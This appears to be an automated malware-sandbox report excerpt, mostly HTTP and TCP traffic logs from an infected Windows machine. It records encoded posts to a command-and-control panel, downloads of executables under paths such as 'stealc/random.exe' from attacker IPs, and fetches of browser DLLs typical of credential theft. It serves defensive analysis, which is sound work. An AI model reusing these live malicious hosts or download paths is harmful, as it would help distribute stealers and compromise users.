Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View	IP Address: 18.65.39.85 18.65.39.85
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GES-ASRU GES-ASRU

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: C:\Users\user\AppData\Local\Temp\1000002001\bfb8bb0dc7.exe

Code function: 11_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

11_2_00405000

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=k+CFrVfwfDyLu+h&MD=zZCe4Eut HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global traffic	HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=k+CFrVfwfDyLu+h&MD=zZCe4Eut HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=k+CFrVfwfDyLu+h&MD=zZCe4Eut HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.150"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: NID=516=hoEfo425YnKdFGHqMFfRYCfYV9ZeWx-yRvThiBrQp37vIZPKX09WdWdTReSgKyFqb9gQk5gXCSFIvz9cIXxZpfKpRKqljJFPZiza4ILadO68fCRsIt7dFHG1CYdAvLyDZ-Uzl4rUwt3dUfP-2OKpDg3jNBFgqGIcACNEFWs5LVKuJq8
Source: global traffic	HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/enter.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
